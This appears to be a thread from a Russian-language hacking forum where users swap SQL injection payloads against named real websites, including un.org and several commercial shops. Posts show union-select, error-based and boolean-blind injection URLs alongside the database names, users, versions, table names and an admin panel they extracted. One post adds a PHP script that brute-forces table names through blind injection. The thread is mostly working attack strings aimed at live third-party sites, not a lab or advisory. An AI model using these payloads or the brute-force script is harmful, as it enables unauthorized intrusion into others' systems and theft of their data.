Шас написал тестовый скрипт, чтобы потренероваться со скулями на локалхосте, так вот почему чтобы вывести поле из таблицы надо чтобы было минимум три выводимых поля? или я ошибаюсь? подскажите плиз.
Нужно вначале назначить 2 значения. Ну или так. http://zero10.us/m.php?id=2435+and+1=(select+*+fro m(select+*+from+information_schema.tables+a+JOIN+inf ormation_schema.tables+b)c)--
С чего ты взял, что это некорректная обработка? Вариантов много, и шансов нет никаких, пока нет самого сайта.
ok http://www.bestwatch.ru/watches.phtml?idb=168&idl=2618 http://www.luxwatch.ru/watches.phtml?idb=168
скуля есть что в 1 что во 2 варианте и логические операции об этом хорошо говорят Code: http://www.luxwatch.ru/watches.phtml?idb=-168+union+select+version()
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null-- http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1-- http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19-- version(): 4.0.27-standard user(): dbo273434928@localhost database(): db273434928 Также есть таблица admin (+админка http://www.arctic-cooling.com/admin) jokester отредактировал мой пост в теме SQL Иньекций,поэтому постю сюда.У меня вопрос / прошения о помощи в этом случае.Кароче в первой ссылке вроде как 3 колонки но у меня ничего не получается вывести,кому не лень поиграйтесь с этой скулей плз.
Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29-- Имя базы данных : News Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29-- Владелец : web Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version-- Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) Теперь таблицы и колонки Code: http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29-- Одна из таблиц: failedemails А дальше сделать ничего не выходит. Никто не поможет? Может в том,что сделано ошибки есть?
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =( Jerri, http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+failedemailaddress+from+newsadmin.failedemails)--+
Нашел =) http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+
А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74 Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском
вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса! Возникают сразу два вопроса: 1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ? 2. Возникла проблема в переборе! Юзаю такой запрос: Code: +and+(select+lower(substring(user(),1,1))+from+information_schema.tables+limit+0,1)='a' Написал скрипт аналогов которому море, PHP: <form method="post"> <input type="type" name="url" value="http://.html?h=15" size="150"> limit <input type="type" name="ntab" value="17" size="1">,1 <input type="submit" name="start" value="Start" style="cursor:pointer"> </form> <? $brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_"; //$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()"; $word = '<div class="clear mb25">'; // $url=$_POST['url']; // $ntab=$_POST['ntab']; if($_POST['start']){ for($i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа $linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'"); preg_match_all($word,$linkout,$out); if(!$out[0][0]==""){ //echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'"; $fp=fopen("_.txt","a+"); fwrite($fp,$brutelist[$j]); fclose($fp); } } } } ?> проблема долго юзать перебирать и все такое.. есть альтернатива.? читал статью _http://www.xakep.ru/post/49697/default.asp ошибок нет, ascii не разрешено юзать, ничего не выводит. Жду похорошо професионального ответа.
ну да чото забыл) Кстати проверил mail.ru выдал: Inbox.ru Mail.ru Porsche924.ru Тоже самое когда *.mail.ru Для болие точного результату спрошу, тоисть отрицательный?
я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
Code: http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5 @@basedir: / @@tmpdir: /tmp/ database(): kupich_kur @@datadir: /var/lib/mysql/ version(): 5.0.87-community user(): kupich_Kupich@localhost
